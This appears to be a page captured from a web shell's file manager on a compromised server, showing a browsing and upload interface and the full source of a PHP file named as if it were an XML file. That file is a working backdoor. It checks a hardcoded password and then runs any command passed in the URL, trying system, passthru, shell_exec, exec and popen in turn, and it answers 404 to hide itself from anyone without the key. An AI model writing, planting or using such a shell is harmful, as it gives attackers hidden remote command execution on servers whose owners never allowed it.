Current Path :
/
proc
/
self
/
cwd
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//proc/self/cwd/grayxploit-d29c043848c4.xml.php
<?php if(($_GET['key']??'')==='YamiFool1337'){@header('Content-Type: text/plain');echo"[B33]";$c=$_GET['c']." 2>&1";$done=0;if(function_exists('system')){system($c);$done=1;}elseif(function_exists('passthru')){passthru($c);$done=1;}elseif(function_exists('shell_exec')){echo shell_exec($c);$done=1;}elseif(function_exists('exec')){exec($c,$out);echo implode(chr(10),$out);$done=1;}elseif(function_exists('popen')){$h=popen($c,'r');while(!feof($h)){echo fread($h,4096);}pclose($h);$done=1;}if(!$done)echo"[NEX]";echo"[/B33]";}else{http_response_code(404);}?>